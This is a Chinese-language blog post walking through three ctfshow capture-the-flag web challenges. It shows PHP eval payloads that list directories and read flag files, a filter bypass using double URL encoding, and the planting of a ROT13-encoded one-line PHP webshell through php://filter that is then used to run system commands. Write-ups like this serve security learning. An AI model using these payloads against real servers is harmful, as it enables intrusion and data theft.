<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>ctfshow 命令执行web67 | l-y-fのblog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="web1题目来源：ctfshow 命令执行web67题目链接(3e5b38cc-3f29-4bdd-8a14-13e6f1016920.challenge.ctf.show)解题思路：启动靶机检查用户是否通过POST方式提交了名为c的参数，如果提交了，就直接用eval()函数将参数值当作PHP代码执行c&#x3D;var_dump(scandir(&quot;&#x2F;&quot;));查看根目录var_dump(">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow 命令执行web67">
<meta property="og:url" content="https://l-y-f-f1111.github.io/2026/08/15/2026-08-15-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb67/index.html">
<meta property="og:site_name" content="l-y-fのblog">
<meta property="og:description" content="web1题目来源：ctfshow 命令执行web67题目链接(3e5b38cc-3f29-4bdd-8a14-13e6f1016920.challenge.ctf.show)解题思路：启动靶机检查用户是否通过POST方式提交了名为c的参数，如果提交了，就直接用eval()函数将参数值当作PHP代码执行c&#x3D;var_dump(scandir(&quot;&#x2F;&quot;));查看根目录var_dump(">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815105116.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815105432.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815105658.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815110407.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815110738.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815110957.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815111450.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815113216.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815113239.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815114441.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815113055.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815115508.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815113141.png">
<meta property="article:published_time" content="2026-08-15T00:00:00.000Z">
<meta property="article:modified_time" content="2026-08-15T12:09:59.433Z">
<meta property="article:author" content="l-y-f">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260815105116.png">
  
    <link rel="alternate" href="/atom.xml" title="l-y-fのblog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">l-y-fのblog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://l-y-f-f1111.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-2026-08-15-ctfshow 命令执行web67" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/08/15/2026-08-15-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb67/" class="article-date">
  <time class="dt-published" datetime="2026-08-15T00:00:00.000Z" itemprop="datePublished">2026-08-15</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      ctfshow 命令执行web67
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h1><p>题目来源：ctfshow 命令执行web67<br>题目链接(<a target="_blank" rel="noopener" href="https://3e5b38cc-3f29-4bdd-8a14-13e6f1016920.challenge.ctf.show/">3e5b38cc-3f29-4bdd-8a14-13e6f1016920.challenge.ctf.show</a>)<br>解题思路：<br>启动靶机<br><img src="/images/Pastedimage20260815105116.png"><br>检查用户是否通过POST方式提交了名为<code>c</code>的参数，如果提交了，就直接用<code>eval()</code>函数将参数值当作PHP代码执行<br><code>c=var_dump(scandir(&quot;/&quot;));</code>查看根目录<br><code>var_dump()</code> 是PHP中最重要的调试函数之一，用于输出变量的完整信息<br><code>scandir()</code> 是PHP中用于列出目录内容的核心函数，相当于Linux中的<code>ls</code>命令或Windows中的<code>dir</code>命令<br><img src="/images/Pastedimage20260815105432.png"><br>发现flag.txt文件<br>读取该文件 <code>c=highlight_file(&quot;/flag.txt&quot;);</code><br><img src="/images/Pastedimage20260815105658.png"><br>得到flag</p>
<h1 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h1><p>题目来源：ctfshow 命令执行web68<br>题目链接(<a target="_blank" rel="noopener" href="https://af100f42-87fb-48bb-ae3e-43b31e3c5a61.challenge.ctf.show/">https://af100f42-87fb-48bb-ae3e-43b31e3c5a61.challenge.ctf.show/</a>)<br>解题思路：<br>启动靶机<br><img src="/images/Pastedimage20260815110407.png"><br>目标服务器（<code>/var/www/html/index.php</code>）上的PHP配置禁用了 <code>highlight_file()</code> 函数<br>和上一题类似 先POST传参看一下根目录<br><img src="/images/Pastedimage20260815110738.png"><br>同样有flag.txt文件 但是 <code>highlight_file()</code>被禁用所以要换个思路<br>尝试一下<code>include()</code><br><code>c=include(&#39;/flag.txt&#39;);</code><br><img src="/images/Pastedimage20260815110957.png"><br>得到flag</p>
<h1 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h1><p>题目来源：ctfshow 文件包含87<br>题目链接(<a target="_blank" rel="noopener" href="https://2942ab6c-e8e0-4d2d-83f9-087abfecfd91.challenge.ctf.show/">https://2942ab6c-e8e0-4d2d-83f9-087abfecfd91.challenge.ctf.show/</a>)<br>解题思路：<br>启动靶机<br><img src="/images/Pastedimage20260815111450.png"><br>GET传入参数<code>file</code> POST传入参数<code>content</code><br>并且参数<code>file</code>要将php data 冒号 点等进行字符替换<br>重点：<code>urldecode($file)</code> <code>urldecode()</code>是URL解码函数 意为将 <code>$file</code> 中的URL编码还原<br>注意：过滤在解码之前执行 所以php编码之后可以绕过过滤<br>那么我们post传入参数<code>file</code>时要进行url编码</p>
<h1 id="整体思路："><a href="#整体思路：" class="headerlink" title="整体思路："></a>整体思路：</h1><p>使用 <code>php://filter</code> 伪协议写入Webshell<br><strong>目标文件</strong>：<code>shell.php</code><br><strong>写入内容</strong>：通过 <code>string.rot13</code> 过滤器编码的恶意代码</p>
<h4 id="1-file参数处理"><a href="#1-file参数处理" class="headerlink" title="1.file参数处理"></a>1.file参数处理</h4><p><code>?file=php://filter/write=string.rot13/resource=shell.php</code><br>实现写入 <code>shell.php</code> 文件时，对内容进行ROT13编码</p>
<p>由于浏览器或Web服务器会自动进行一次URL解码，如果只编码一次，PHP接收到时就已经是原始的危险字符，会被 <code>str_replace</code> 直接过滤掉；因此要进行两次编码，自动解码只剥掉一层，PHP收到的仍然是编码字符串，从而绕过过滤，最后PHP自己调用 <code>urldecode()</code> 解码得到真正的文件名，实现写入<br>在burp的编码工具上对<code>php://filter/write=string.rot13/resource=shell.php</code>进行两次url编码<br><img src="/images/Pastedimage20260815113216.png"></p>
<p><img src="/images/Pastedimage20260815113239.png"><br>得到<code>%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30</code></p>
<h4 id="2-content参数处理"><a href="#2-content参数处理" class="headerlink" title="2.content参数处理"></a>2.content参数处理</h4><p><code>?content=&lt;?php @eval($_GET[1]);?&gt;</code><br>由于<code>file</code>使用的ROT13过滤器，写入 <code>shell.php</code> 时，内容会先经过ROT13解码再保存<br>所以要先对<code>content</code>的内容进行ROT13编码，这样写入shell.php时就是要传入的一句话木马<br><img src="/images/Pastedimage20260815114441.png"><br>进行ROT13编码之后得到<code>&lt;?cuc @riny($_TRG[1]);?&gt;</code></p>
<h4 id="3-进行传参"><a href="#3-进行传参" class="headerlink" title="3.进行传参"></a>3.进行传参</h4><p><img src="/images/Pastedimage20260815113055.png"></p>
<p><code>/shell.php?1=system(&quot;ls&quot;);</code><br>通过GET参数 1 向 shell.php 传递 system(“ls”) 命令，让服务器执行Linux的 ls 命令，列出当前目录下的所有文件和文件夹，并将结果返回给浏览器<br><img src="/images/Pastedimage20260815115508.png"><br>同样<br><code>shell.php?1=system(&quot;tac%20fl0g.php&quot;);</code><br>通过GET参数 <code>1</code> 向 <code>shell.php</code> 传递 <code>system(&quot;tac fl0g.php&quot;)</code> 命令，让服务器执行Linux的 <code>tac</code> 命令，从最后一行开始逆序读取 <code>fl0g.php</code> 文件的内容并返回给浏览器，从而绕过PHP解析直接获取flag文件的源码。<br><img src="/images/Pastedimage20260815113141.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://l-y-f-f1111.github.io/2026/08/15/2026-08-15-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb67/" data-id="cmsvpzk4m000b5wuyf1o14h5p" data-title="ctfshow 命令执行web67" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2026/08/16/2026-08-16-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb69/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">前一篇</strong>
      <div class="article-nav-title">
        
          ctfshow 命令执行web69
        
      </div>
    </a>
  
  
    <a href="/2026/08/14/2026-08-14-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb58/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">ctfshow 命令执行web58</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/08/">八月 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/07/">七月 2026</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/08/20/2026-08-20-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb71/">ctfshow 命令执行web71</a>
          </li>
        
          <li>
            <a href="/2026/08/16/2026-08-16-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb69/">ctfshow 命令执行web69</a>
          </li>
        
          <li>
            <a href="/2026/08/15/2026-08-15-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb67/">ctfshow 命令执行web67</a>
          </li>
        
          <li>
            <a href="/2026/08/14/2026-08-14-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb58/">ctfshow 命令执行web58</a>
          </li>
        
          <li>
            <a href="/2026/08/13/2026-08-13-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb54/">ctfshow 命令执行web54</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 l-y-f<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>